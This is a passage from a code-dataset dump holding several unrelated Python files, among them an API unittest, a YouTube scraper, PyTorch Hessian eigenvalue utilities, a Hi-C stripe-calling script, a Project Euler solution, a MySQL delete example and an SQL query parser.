CookiesUtil.qa_ip\nqa_port = CookiesUtil.qa_port\nqa_http = CookiesUtil.qa_http\n\n\nclass Test(unittest.TestCase):\n log = Log()\n\n def setUp(self):\n self.headers = {\n \"Accept\": \"image/webp,image/apng,image/*,*/*;q=0.8\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n \"Cookie\": Cookie\n }\n\n def tearDown(self):\n # print(self.result)\n pass\n\n def test_1_alarmCenter_queryAlarmStoreList(self):\n '''报警中心-算分top30接口'''\n self.log.info(\"------ 报警中心-算分top30接口:start!---------\")\n self.alarmCenter_queryAlarmStoreList_url = '' + qa_http + '://' + qa_ip + ':' + qa_port + '/alarmCenter/queryAlarmStoreList'\n r = requests.get(self.alarmCenter_queryAlarmStoreList_url, headers=self.headers, verify=False)\n print(self.alarmCenter_queryAlarmStoreList_url)\n self.result = r.json()\n self.log.info(\"------ 报警中心-算分top30接口:响应结果:%s\" % self.result)\n self.status_code = r.status_code\n self.assertEqual(self.status_code, 200)\n print(self.result)\n print(self.result['vehicleId'])\n self.log.info(\"------ 报警中心-算分top30接口:end!---------\")\n\n def test_2_alarmCenter_queryAlarmTopTen(self):\n '''报警中心-top10 接口'''\n self.log.info(\"------ 报警中心-top10 接口:start!---------\")\n self.alarmCenter_queryAlarmTopTen_url = '' + qa_http + '://' + qa_ip + ':' + qa_port + '/alarmCenter/queryAlarmTopTen?vehicleId=300007&pageNo=1&pageSize=10'\n r = requests.get(self.alarmCenter_queryAlarmTopTen_url, headers=self.headers, verify=False)\n print(self.alarmCenter_queryAlarmTopTen_url)\n self.result = r.json()\n self.log.info(\"------ 报警中心-top10 接口:响应结果:%s\" % self.result)\n self.status_code = r.status_code\n self.assertEqual(self.status_code, 200)\n # self.assertTrue(self.result['success'])\n print(self.result)\n self.log.info(\"------ 报警中心-top10 接口:end!---------\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"SamplesInterface/case/case02_alarmCenter/test03.py","file_name":"test03.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"123334979","text":"# -*- coding:utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nimport requests\nfrom operator import itemgetter\n#import collections\n#from selenium import webdriver\n#from selenium.webdriver.support.wait import WebDriverWait\n#from selenium.webdriver.support import expected_conditions as EC\n#from selenium.webdriver.common.by import By\n\nimport re\n\nurl_base = \"https://www.youtube.com/results?search_query=Chitãozinho+e+Chororó\"\nurls = []\nnomes = []\nvisualizacoes = []\n\nconexao = requests.get(url_base)\nsopa_dados = BeautifulSoup(conexao.text, 'html.parser')\ndados = sopa_dados.findAll('a', attrs={'class':'yt-uix-tile-link'})\n\nfor i in dados:\n url = \"https://www.youtube.com\" + i['href']\n urls.append(url)\n nome = i['title']\n nomes.append(nome)\nfor i in range(0, len(urls)):\n #print(urls[i])\n #print(nomes[i])\n conexao = requests.get(urls[i])\n sopa_videos = BeautifulSoup(conexao.text, 'html.parser')\n visu = sopa_videos.find('div', class_=\"watch-view-count\")\n if(visu == None):\n visualizacoes.append(0)\n # print('É um usuário')\n else:\n visu = visu.text\n visu = int(re.sub('[^0-9]', '', visu))\n # print(visu)\n # print(type(visu))\n visualizacoes.append(visu)\n #print('-'*100)\n\ndic = {}\nfor i in range(0, len(nomes)):\n dic[visualizacoes[i]] = {nomes[i]}\n\nprint('Ordenamento:\\n')\nsorte = sorted(dic.items(), key=itemgetter(0))\nfor c in sorte:\n print(c)","sub_path":"BuscaWeb.py","file_name":"BuscaWeb.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"535852833","text":"# -*- coding: utf-8 -*-\nimport torch\n\nfrom pcode.measures.power_iter import Operator, deflated_power_iteration\n\n\n\"\"\"evaluate the top-k eigenvalues/eigenvector of the hessian.\n\nThis module defines a linear operator to compute the hessian-vector product\nfor a given pytorch model using subsampled data.\n\"\"\"\n\n\nclass HVPOperator(Operator):\n \"\"\"\n Use PyTorch autograd for Hessian Vec product calculation\n model: PyTorch network to compute hessian for\n dataloader: pytorch dataloader that we get examples from to compute grads\n loss: Loss function to descend (e.g. F.cross_entropy)\n use_gpu: use cuda or not\n max_samples: max number of examples per batch using all GPUs.\n \"\"\"\n\n def __init__(self, model, dataloader, criterion, use_gpu=True, max_samples=512):\n size = int(sum(p.numel() for p in model.parameters()))\n super(HVPOperator, self).__init__(size)\n self.grad_vec = torch.zeros(size)\n self.model = model\n if use_gpu:\n self.model = self.model.cuda()\n self.dataloader = dataloader\n # Make a copy since we will go over it a bunch\n self.dataloader_iter = iter(dataloader)\n self.criterion = criterion\n self.use_gpu = use_gpu\n self.max_samples = max_samples\n\n def apply(self, vec):\n \"\"\"\n Returns H*vec where H is the hessian of the loss w.r.t.\n the vectorized model parameters\n \"\"\"\n # compute original gradient, tracking computation graph\n self.zero_grad()\n grad_vec = self.prepare_grad()\n # compute the product\n grad_product = torch.sum(grad_vec * vec)\n self.zero_grad()\n # take the second gradient\n grad_grad = torch.autograd.grad(grad_product, self.model.parameters())\n # concatenate the results over the different components of the network\n hessian_vec_prod = torch.cat([g.contiguous().view(-1) for g in grad_grad])\n return hessian_vec_prod\n\n def zero_grad(self):\n \"\"\"\n Zeros out the gradient info for each parameter in the model\n \"\"\"\n for p in self.model.parameters():\n if p.grad is not None:\n p.grad.data.zero_()\n\n def prepare_grad(self):\n \"\"\"\n Compute gradient w.r.t loss over all parameters and vectorize\n \"\"\"\n try:\n all_inputs, all_targets = next(self.dataloader_iter)\n except StopIteration:\n self.dataloader_iter = iter(self.dataloader)\n all_inputs, all_targets = next(self.dataloader_iter)\n\n num_chunks = max(1, len(all_inputs) // self.max_samples)\n\n grad_vec = False\n\n input_chunks = all_inputs.chunk(num_chunks)\n target_chunks = all_targets.chunk(num_chunks)\n for input, target in zip(input_chunks, target_chunks):\n if self.use_gpu:\n input = input.cuda()\n target = target.cuda()\n\n output = self.model(input)\n loss = self.criterion(output, target)\n grad_dict = torch.autograd.grad(\n loss, self.model.parameters(), create_graph=True\n )\n if grad_vec:\n grad_vec += torch.cat([g.contiguous().view(-1) for g in grad_dict])\n else:\n grad_vec = torch.cat([g.contiguous().view(-1) for g in grad_dict])\n grad_vec /= num_chunks\n self.grad_vec = grad_vec\n return self.grad_vec\n\n\ndef compute_hessian_eigenthings(\n model,\n dataloader,\n criterion,\n num_eigenthings=10,\n power_iter_steps=20,\n power_iter_err_threshold=1e-4,\n momentum=0.0,\n use_gpu=True,\n max_samples=512,\n):\n \"\"\"\n Computes the top `num_eigenthings` eigenvalues and eigenvecs\n for the hessian of the given model by using subsampled power iteration\n with deflation and the hessian-vector product\n \"\"\"\n hvp_operator = HVPOperator(\n model, dataloader, criterion, use_gpu=use_gpu, max_samples=max_samples\n )\n eigenvals, eigenvecs = deflated_power_iteration(\n hvp_operator,\n num_eigenthings,\n power_iter_steps,\n power_iter_err_threshold,\n momentum=momentum,\n use_gpu=use_gpu,\n )\n return eigenvals, eigenvecs\n\n\n\"\"\"evaluate the dominant eigenvalues of the hessian.\"\"\"\n\n#\n# @file Different utility functions\n# Copyright (c) Zhewei Yao, Amir Gholami\n# All rights reserved.\n# This file is part of HessianFlow library.\n#\n# HessianFlow is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# HessianFlow is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with HessianFlow. If not, see <http://www.gnu.org/licenses/>.\n#\n\n\ndef get_eigen(model, inputs, targets, criterion, cuda=True, maxIter=50, tol=1e-3):\n \"\"\"\n compute the top eigenvalues of model parameters and\n the corresponding eigenvectors.\n \"\"\"\n if cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n device = \"cuda\"\n else:\n device = \"cpu\"\n\n model.eval()\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n loss.backward(create_graph=True)\n\n params, gradsH = get_params_grad(model)\n v = [torch.randn(p.size()).to(device) for p in params]\n v = normalization(v)\n\n eigenvalue = None\n\n for _ in range(maxIter):\n model.zero_grad()\n Hv = hessian_vector_product(gradsH, params, v)\n eigenvalue_tmp = group_product(Hv, v).cpu().item()\n v = normalization(Hv)\n\n if eigenvalue is None:\n eigenvalue = eigenvalue_tmp\n else:\n if abs(eigenvalue - eigenvalue_tmp) < tol:\n return eigenvalue_tmp, v\n else:\n eigenvalue = eigenvalue_tmp\n return eigenvalue, v\n\n\ndef get_eigen_full_dataset(\n model, dataloader, criterion, cuda=True, maxIter=50, tol=1e-3\n):\n \"\"\"\n compute the top eigenvalues of model parameters and\n the corresponding eigenvectors with a full dataset.\n Notice, this is very expensive.\n \"\"\"\n if cuda:\n device = \"cuda\"\n else:\n device = \"cpu\"\n model.eval()\n\n params, _ = get_params_grad(model)\n v = [torch.randn(p.size()).to(device) for p in params]\n v = normalization(v)\n\n batch_size = None\n eigenvalue = None\n\n for _ in range(maxIter):\n THv = [torch.zeros(p.size()).to(device) for p in params]\n counter = 0\n for inputs, targets in dataloader:\n\n if batch_size is None:\n batch_size = targets.size(0)\n\n if targets.size(0) < batch_size:\n continue\n\n model.zero_grad()\n outputs = model(inputs.to(device))\n loss = criterion(outputs, targets.to(device))\n loss.backward(create_graph=True)\n\n params, gradsH = get_params_grad(model)\n Hv = torch.autograd.grad(\n gradsH, params, grad_outputs=v, only_inputs=True, retain_graph=False\n )\n\n THv = [THv1 + Hv1 + 0.0 for THv1, Hv1 in zip(THv, Hv)]\n counter += 1\n\n eigenvalue_tmp = group_product(THv, v).cpu().item() / float(counter)\n v = normalization(THv)\n\n if eigenvalue is None:\n eigenvalue = eigenvalue_tmp\n else:\n if abs(eigenvalue - eigenvalue_tmp) < tol:\n return eigenvalue_tmp, v\n else:\n eigenvalue = eigenvalue_tmp\n\n return eigenvalue, v\n\n\ndef group_product(xs, ys):\n \"\"\"\n the inner product of two lists of variables xs,ys\n :param xs:\n :param ys:\n :return:\n \"\"\"\n return sum([torch.sum(x * y) for (x, y) in zip(xs, ys)])\n\n\ndef group_add(params, update, alpha=1):\n \"\"\"\n params = params + update*alpha\n :param params: list of variable\n :param update: list of data\n :return:\n \"\"\"\n for i, _ in enumerate(params):\n params[i].data.add_(update[i] * alpha)\n return params\n\n\ndef normalization(v):\n \"\"\"\n normalization of a list of vectors\n return: normalized vectors v\n \"\"\"\n s = group_product(v, v)\n s = s ** 0.5\n s = s.cpu().item()\n v = [vi / (s + 1e-6) for vi in v]\n return v\n\n\ndef get_params_grad(model):\n \"\"\"\n get model parameters and corresponding gradients\n \"\"\"\n params = []\n grads = []\n for param in model.parameters():\n params.append(param)\n if param.grad is None:\n continue\n grads.append(param.grad + 0.0)\n return params, grads\n\n\ndef hessian_vector_product(gradsH, params, v):\n \"\"\"\n compute the hessian vector product of Hv, where\n gradsH is the gradient at the current point,\n params is the corresponding variables,\n v is the vector.\n \"\"\"\n hv = torch.autograd.grad(\n gradsH, params, grad_outputs=v, only_inputs=True, retain_graph=True\n )\n return hv\n","sub_path":"tasks/computer-vision/pytorch/pcode/measures/hessian_flow.py","file_name":"hessian_flow.py","file_ext":"py","file_size_in_byte":9178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"404704303","text":"import os\nimport re\nimport numpy as np\nfrom scipy.signal import find_peaks\nfrom scipy.stats import kruskal, poisson\n\n\ndef hic2txt(hic_file, ch, resolution=1000, output='temp.txt'):\n \"\"\"\n Dump .hic file into contact lists\n :param hic_file: (str) .hic file path\n :param ch: (str) chromosome\n :param resolution: (int) resolution to use\n :param output: (str) temporary output path\n \"\"\"\n # cmd = f'java -jar {juicer} dump observed KR {hic_file} {ch} {ch} BP {resolution} {output}'\n cmd = f'java -jar {juicer} dump oe KR {hic_file} {ch} {ch} BP {resolution} {output}'\n os.system(cmd)\n\n\ndef load_chrom_sizes(reference_genome):\n \"\"\"\n Load chromosome sizes for a reference genome\n \"\"\"\n my_path = os.path.abspath(os.path.dirname(__file__))\n rg_path = f'{my_path}/reference_genome/{reference_genome}'\n f = open(rg_path)\n lengths = {}\n for line in f:\n [ch, l] = line.strip().split()\n lengths[ch] = int(l)\n return lengths\n\n\ndef txt2horizontal(txt, length, max_range, resolution=1000):\n \"\"\"\n :param txt: str, path of input .txt file\n :param length: chromosome length\n :param max_range: int, max distance\n :param resolution: int, default: 25000\n \"\"\"\n assert max_range % resolution == 0\n f = open(txt)\n n_bins = length // resolution + 1\n rg = max_range // resolution\n mat = np.zeros((n_bins, rg))\n cnt = 0\n for line in f:\n if cnt % 5000000 == 0:\n print(' ', cnt)\n cnt += 1\n p1, p2, v = line.strip().split()\n if v == 'NaN':\n continue\n p1, p2, v = int(p1), int(p2), float(v)\n if max(p1, p2) >= n_bins * resolution:\n continue\n if p1 > p2:\n p1, p2 = p2, p1\n p1, p2 = p1 // resolution, p2 // resolution\n if p2 - p1 >= rg:\n continue\n mat[p1, p2 - p1] += v\n return mat\n\n\ndef txt2vertical(txt, length, max_range, resolution=1000):\n \"\"\"\n :param txt: str, path of input .txt file\n :param length: chromosome length\n :param max_range: int, max distance\n :param resolution: int, default: 25000\n \"\"\"\n assert max_range % resolution == 0\n f = open(txt)\n n_bins = length // resolution + 1\n rg = max_range // resolution\n mat = np.zeros((n_bins, rg))\n cnt = 0\n for line in f:\n if cnt % 5000000 == 0:\n print(' ', cnt)\n cnt += 1\n p1, p2, v = line.strip().split()\n if v == 'NaN':\n continue\n p1, p2, v = int(p1), int(p2), float(v)\n if max(p1, p2) >= n_bins * resolution:\n continue\n if p1 > p2:\n p1, p2 = p2, p1\n p1, p2 = p1 // resolution, p2 // resolution\n if p2 - p1 >= rg:\n continue\n mat[p2, p2 - p1] += v\n return mat\n\n\ndef pick_max_positions(mat, interval=10000, distance_range=(10000, 160000), resolution=1000,\n line_width=1, window_size=10):\n assert interval % resolution == 0\n assert distance_range[0] % resolution == 0\n assert distance_range[1] % resolution == 0\n\n st, ed = distance_range[0] // resolution, distance_range[1] // resolution\n size = interval // resolution\n length = mat.shape[0]\n stats = np.sum(mat[:, st:ed], axis=1)\n all_pos = []\n for i in range(0, length, size):\n region = stats[i: min(i + size, length)]\n idx = int(np.argmax(region) + i)\n # print(idx, window_size, mat.shape[0] - window_size)\n\n if idx < window_size or idx >= mat.shape[0] - window_size:\n continue\n\n previous = stats[max(0, idx - size): idx-1]\n later = stats[idx + 2: min(idx + size + 1, length)]\n # print(stats[idx], np.max(previous), np.max(later))\n\n if stats[idx] > np.max(previous) and stats[idx] > np.max(later):\n # print(idx)\n check = enrichment_score(mat, idx, line_width,\n (st, ed), window_size)\n if np.sum(check) > 0:\n all_pos.append(idx)\n return all_pos\n\n\ndef pick_max_positions2(mat, distance_range=(10, 160), line_width=1, window_size=10):\n st, ed = distance_range\n stats = np.sum(mat[:, st:ed], axis=1)\n all_pos = []\n\n all_peaks, _ = find_peaks(stats, distance=window_size*2)\n for idx in all_peaks:\n check = enrichment_score(mat, idx, line_width, (st, ed), window_size)\n if np.sum(check) > 0:\n all_pos.append(idx)\n return all_pos\n\n\ndef enrichment_score(mat, idx, line_width=1, distance_range=(20, 40), window_size=10):\n # st, ed = max(distance_range[0], window_size), min(distance_range[1], mat.shape[1] - window_size)\n half = int(line_width // 2)\n x1, x2 = idx - half, idx - half + line_width\n\n new_mat = np.zeros((distance_range[1] - distance_range[0],))\n for j in range(distance_range[0], distance_range[1]):\n if j < window_size + half or j >= mat.shape[1] - window_size - half:\n continue\n y = j - distance_range[0]\n line_min = min(np.mean(mat[x1:x2, j-window_size-half:j-half]),\n np.mean(mat[x1:x2, j+1+half:j+window_size+half+1]))\n neighbor_mean = max(np.mean(mat[idx-window_size:x1, j-window_size-half:j+window_size+half+1]),\n np.mean(mat[x2+1:idx+window_size+1, j-window_size-half:j+window_size+half+1]))\n new_mat[y] = line_min - neighbor_mean\n return new_mat\n\n\ndef enrichment_score2(mat, idx, line_width=1, distance_range=(5, 100), window_size=10):\n # st, ed = max(distance_range[0], window_size), min(distance_range[1], mat.shape[1] - window_size)\n half = int(line_width // 2)\n x1, x2 = idx - half, idx - half + line_width\n\n new_mat = np.zeros((distance_range[1] - distance_range[0],))\n for j in range(distance_range[0], distance_range[1]):\n # print(j)\n if j < window_size + half or j >= mat.shape[1] - window_size - half:\n continue\n y = j - distance_range[0]\n # line_min = np.median(np.concatenate(\n # [mat[x1:x2, j-window_size-half:j-half], mat[x1:x2, j+1+half:j+window_size+half+1]]\n # ))\n line_min = np.median(\n [mat[x1:x2, j - window_size - half:j + window_size + half + 1]]\n )\n neighbor_mean = max(np.mean(mat[idx-window_size:x1, j-window_size-half:j+window_size+half+1]),\n np.mean(mat[x2+1:idx+window_size+1, j-window_size-half:j+window_size+half+1]))\n # print(line_min, neighbor_mean)\n\n lower_b = 0.2\n upper_mlogp = 10\n _exp = max(neighbor_mean, lower_b)\n\n Poiss = poisson(_exp)\n p_val = 1 - Poiss.cdf(line_min)\n new_mat[y] = new_mat[y] = min(- np.log10(p_val), upper_mlogp) if p_val > 0 else upper_mlogp\n return new_mat\n\n\ndef find_max_slice(arr):\n _max, head, tail = 0, 0, 0\n _max_ending, h, t = 0, 0, 0\n i = 0\n while i < len(arr):\n _max_ending = _max_ending + arr[i]\n if _max_ending < 0:\n h, t = i + 1, i + 1\n _max_ending = 0\n else:\n t = i + 1\n if _max_ending > _max:\n head, tail, _max = h, t, _max_ending\n i += 1\n return head, tail, _max\n\n\ndef merge_positions(lst, merge_range):\n def _merge(small_lst):\n st = min([elm[0] for elm in small_lst])\n ed = max([elm[1] for elm in small_lst])\n head = min([elm[2] for elm in small_lst])\n tail = max([elm[3] for elm in small_lst])\n score = max([elm[4] for elm in small_lst])\n return [st, ed, head, tail, score]\n\n new_lst = []\n temp = []\n for i, (idx, head, tail, score) in enumerate(lst):\n if i == 0:\n temp.append([idx, idx, head, tail, score])\n elif idx - temp[-1][1] <= merge_range:\n temp.append([idx, idx, head, tail, score])\n else:\n new_lst.append(_merge(temp))\n temp = [[idx, idx, head, tail, score]]\n new_lst.append(_merge(temp))\n return new_lst\n\n\ndef stat_test(mat, st, ed, line_width, head, tail, window_size):\n half = int(line_width // 2)\n x1, x2 = st - half, ed + half + 1\n r1 = mat[x1-window_size:x1, head:tail].flatten()\n r2 = mat[x2:x2+window_size, head:tail].flatten()\n r = mat[x1:x2, head:tail].flatten()\n\n t1, p1 = kruskal(r, r1)\n t2, p2 = kruskal(r, r2)\n return max(p1, p2)\n\n\ndef _stripe_caller(mat, max_range=150000, resolution=1000,\n min_length=30000, closeness=50000,\n stripe_width=1, merge=1, window_size=8, threshold=0.01):\n assert max_range % resolution == 0\n assert min_length % resolution == 0\n\n # Step 2: for different distance ranges pick the \"local maximum\" positions\n print(' Finding local maximum for different contact distances...')\n positions = {}\n # Split the max range into small distance ranges\n for dis in range(0, max_range, min_length):\n _min = dis\n if dis + 2 * min_length > max_range:\n _max = max_range\n else:\n _max = dis + min_length\n print(f' {_min}-{_max}', end=' ')\n distance_range = (_min // resolution, _max // resolution)\n pos_h = pick_max_positions2(mat, distance_range=distance_range, line_width=stripe_width, window_size=window_size)\n print(len(pos_h))\n for p in pos_h:\n if p not in positions:\n positions[p] = []\n positions[p].append(distance_range)\n print(' Total:', len(positions))\n\n # Step 3: find the accurate range of stripe\n print(' Finding the spanning range for each stripe...')\n all_positions = []\n lst = sorted(positions.keys())\n for i, idx in enumerate(lst):\n # print(i, idx)\n if idx <= window_size or idx >= mat.shape[0] - window_size:\n continue\n arr = enrichment_score2(mat, idx, line_width=stripe_width,\n distance_range=(0, max_range // resolution),\n window_size=window_size)\n arr = arr + np.log10(threshold)\n head, tail, _max = find_max_slice(arr)\n all_positions.append((idx, head, tail, _max))\n\n # Step 4: Merging\n print(' Merging...')\n all_positions = merge_positions(all_positions, merge)\n print(len(all_positions))\n\n print(' Filtering by distance and length ...')\n new_positions = []\n for elm in all_positions:\n # print(elm, end=' ')\n if (elm[3] - elm[2]) * resolution >= min_length and elm[2] * resolution <= closeness:\n # print(True)\n new_positions.append(elm)\n else:\n # print(False)\n pass\n print(len(new_positions))\n\n # Step 5: Statistical test\n results = []\n print(' Tests...')\n for elm in new_positions:\n [st, ed, head, tail, score] = elm\n # p = stat_test(mat, st, ed, stripe_width, head, tail, window_size)\n # print(idx * resolution, p)\n # if score > threshold:\n results.append((st, (ed + 1), head, tail, score / (tail - head)))\n print(len(results))\n return results\n\n\ndef stripe_caller_all(\n hic_file,\n chromosomes,\n output_file,\n threshold=0.01,\n max_range=150000, resolution=1000,\n min_length=30000, closeness=50000,\n stripe_width=1, merge=1, window_size=8,\n reference_genome='hg38'\n):\n ch_sizes = load_chrom_sizes(reference_genome)\n\n f = open(output_file, 'w')\n f.write('#chr1\\tx1\\tx2\\tchr2\\ty1\\ty2\\tenrichment\\n')\n\n for ch in chromosomes:\n if ch == 'chr14':\n continue\n\n print(f'Calling for {ch}...')\n hic2txt(hic_file, ch, resolution=resolution, output='temp.txt')\n\n # horizontal\n mat = txt2horizontal('temp.txt', length=ch_sizes[ch], max_range=max_range + min_length, resolution=resolution)\n results = _stripe_caller(mat, threshold=threshold,\n max_range=max_range, resolution=resolution,\n min_length=min_length, closeness=closeness,\n stripe_width=stripe_width, merge=merge, window_size=window_size)\n for (st, ed, hd, tl, sc) in results:\n f.write(f'{ch}\\t{st*resolution}\\t{ed*resolution}\\t{ch}\\t{max((st+hd), ed)*resolution}\\t{(ed+tl)*resolution}\\t{sc}\\n')\n\n # vertical\n mat = txt2vertical('temp.txt', length=ch_sizes[ch], max_range=max_range + min_length, resolution=resolution)\n results = _stripe_caller(mat, threshold=threshold,\n max_range=max_range, resolution=resolution,\n min_length=min_length, closeness=closeness,\n stripe_width=stripe_width, merge=merge, window_size=window_size)\n for (st, ed, hd, tl, sc) in results:\n f.write(f'{ch}\\t{(st-tl)*resolution}\\t{min((ed-hd), st)*resolution}\\t{ch}\\t{st*resolution}\\t{ed*resolution}\\t{sc}\\n')\n\n f.close()\n\n\nif __name__ == '__main__':\n # HFF threshold: 50\n # hESC threshold: 40\n # chromosomes = [f'chr{i}' for i in list(range(1, 23)) + ['X']]\n juicer = '/nfs/turbo/umms-drjieliu/juicer_tools_1.11.04_jcuda.0.8.jar'\n chromosomes = ['chr1']\n\n hic_file = '/nfs/turbo/umms-drjieliu/proj/4dn/data/microC/HFF/raw/HFFc6.hic'\n thr = 0.01\n stripe_caller_all(\n hic_file=hic_file,\n chromosomes=chromosomes,\n output_file='HFF_MicroC_stripes_chr1.bedpe',\n threshold=thr\n )\n\n hic_file = '/nfs/turbo/umms-drjieliu/proj/4dn/data/microC/hESC/raw/H1-hESC.hic'\n thr = 0.01\n stripe_caller_all(\n hic_file=hic_file,\n chromosomes=chromosomes,\n output_file='H1_MicroC_stripes_chr1.bedpe',\n threshold=thr\n )\n\n # hic_file = '/nfs/turbo/umms-drjieliu/proj/4dn/data/bulkHiC/GM12878/GM12878.hic'\n # thr = 50\n # stripe_caller_all(\n # hic_file=hic_file,\n # chromosomes=chromosomes,\n # output_file='GM12878_HiC_stripes_chr1.bedpe',\n # threshold=thr,\n # max_range=5000000, resolution=25000,\n # min_length=1000000, closeness=1000000,\n # stripe_width=1, merge=1, window_size=8\n # )\n\n\n\n\n\n","sub_path":"Manuscript/fig2/02_fine_scale/stripe_caller/Quagga_V0.2.py","file_name":"Quagga_V0.2.py","file_ext":"py","file_size_in_byte":14117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"255583061","text":"import functools\nimport time\nstart = time.time()\n\nPrimes = [2,3,5,7,11,13,17]\n\nnbs = [9,8,7,6,5,4,3,2,1,0]\n\n@functools.lru_cache(maxsize=None)\ndef isSpecial(strNb):\n return int(strNb[len(strNb)-3:])%Primes[len(strNb)-4] == 0\n\nsum = 0\n\ndef getPande(arr, strNb):\n global sum\n if len(arr) == 0 :\n if isSpecial(strNb):\n return int(strNb)\n else :\n return 0\n else :\n if len(strNb) >= 4 :\n if not isSpecial(strNb) :\n return 0\n tempS = 0\n for i in range (0,len(arr)):\n tempS += getPande(arr[:i]+arr[i+1:],strNb+str(arr[i]))\n return tempS\n\nprint('Euler n°43 answer :',getPande(nbs,''))\nprint('Find in :', \"%.2f\" % (time.time()-start),'sec')\n","sub_path":"041-060/Euler_043.py","file_name":"Euler_043.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"82558011","text":"# @staticmethod nd @classmethod in python\n\nclass Student:\n\tdef __init__(self,name,school):\n\t\tself.name = name\n\t\tself.school = school\n\t\tself.marks = [10]\n\n\tdef addMarks(self,mark):\n\t\tself.marks.append(mark)\n\n\t@classmethod\n\tdef addFriend(*args):\n\t\tif len(args)==3:\n\t\t\treturn args[0](args[2],args[1].school)\n\t\telif len(args)==4:\n\t\t\treturn args[0](args[2],args[1].school,args[3])\n\nclass WorkingSudent(Student):\n\tdef __init__(self,name,school,salary):\n\t\tsuper().__init__(name,school)\n\t\tself.salary = salary\n\nanna = WorkingSudent(\"Anna\",\"MIT\",234)\nanna.addMarks(50)\nprint('{} studies in {} school. Her salary is ${}. Her marks are {}'.format(anna.name,anna.school,anna.salary,anna.marks))\n\ngreg = WorkingSudent.addFriend(anna,\"Greg\",325)\ngreg.addMarks(80)\nprint('{} studies in {} school. His salary is ${}. His marks are {}'.format(greg.name,greg.school,greg.salary,greg.marks))\n\nrachel = Student('Rachel','Stanford')\nrachel.addMarks(60)\nprint('{} studies in {} school. Her marks are {}'.format(rachel.name,rachel.school,rachel.marks))\n\nsam = Student.addFriend(rachel,'Sam')\nsam.addMarks(85)\nprint('{} studies in {} school. His marks are {}'.format(sam.name,sam.school,sam.marks))","sub_path":"section 2/static_and_class_methods.py","file_name":"static_and_class_methods.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"59296435","text":"import datetime\nimport mysql.connector\n\ncnx = mysql.connector.connect(user='root', database='bajaj_insurance', port=3306, host=\"localhost\")\n\ncursor = cnx.cursor()\n\n# query = \"UPDATE insurance_transaction set transaction_id = 'abhishek tomar' where idinsurance_transaction=1\"\nquery = \"DELETE from insurance_transaction where idinsurance_transaction = 1\"\n\n\ncursor.execute(query)\n\n# this will give you results count which are affected....\ncursor.rowcount\n\n\nprint(\"result : \" + str(cursor.rowcount))\n\n\ncursor.close()\ncnx.commit()\ncnx.close()","sub_path":"batch_3/session_6/3_delete_sql.py","file_name":"3_delete_sql.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"205597947","text":"from typing import List, Optional\n\nimport sql_metadata\nfrom sql_metadata import Parser, QueryType\n\nDDL = {QueryType.CREATE, QueryType.DROP, QueryType.ALTER, QueryType.SELECT}\nDML = {QueryType.INSERT, QueryType.UPDATE, QueryType.DELETE}\n\n\nclass ParseSqlError(Exception):\n ...\n\n\nclass UnsupportedQueryType(ParseSqlError):\n ...\n\n\nclass SqlStatement:\n def __init__(self, sql: str, skip_wc: bool = True):\n self.inputs: Optional[List[str]] = []\n self.outputs: Optional[List[str]] = []\n self.comments: Optional[List[str]] = []\n self.skip_wc = skip_wc\n\n self._columns: Optional[List[str]] = []\n self._sql = sql\n\n self.parse_sql()\n\n @property\n def columns(self) -> List[str]:\n return self._columns\n\n @columns.setter\n def columns(self, columns: List[str]):\n if self.skip_wc:\n self._columns = [col for col in columns if \"*\" not in col]\n else:\n self._columns = columns\n\n def parse_sql(self) -> None:\n parser = sql_metadata.Parser(self._sql)\n\n try:\n query_type: str = parser.query_type\n\n if query_type in DDL:\n self.__parse_ddl(parser)\n elif query_type in DML:\n self.__parse_dml(parser)\n else:\n raise ValueError(f\"Unsupported type {query_type}\")\n\n self.comments = parser.comments\n\n except ValueError as e:\n raise UnsupportedQueryType from e\n\n def __parse_dml(self, parser: Parser):\n self.outputs = parser.tables\n self.columns = parser.columns\n\n def __parse_ddl(self, parser: Parser):\n self.inputs = parser.tables\n self.columns = parser.columns\n","sub_path":"odd_models/sql_parser.py","file_name":"sql_parser.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"26739961","text":"##\n# Initiates the EXIF tab\n##\ndef tab_init(t):\n\tif t == \"exif\":\n\t\ttext = \"EXIF - Edition\";\n\t\tcurr = tabExif;\n\telif t == \"xmp\":\n\t\ttext = \"XMP - Edition\";\n\t\tcurr = tabXmp;\n\telif t == \"iptc\":\n\t\ttext = \"IPTC - Edition\";\n\t\tcurr = tabIptc;\n\telse:\n\t\tlabel = Label(tabExif, text=\"EXIF - Edition\", font=13);\n\t\tlabel.grid(row=1, column=1, rowspan=2);\n\t\tlabel = Label(tabXmp, text=\"XMP - Edition\", font=13);\n\t\tlabel.grid(row=1, column=1, rowspan=2);\n\t\tlabel = Label(tabIptc, text=\"IPTC - Edition\", font=13);\n\t\tlabel.grid(row=1, column=1, 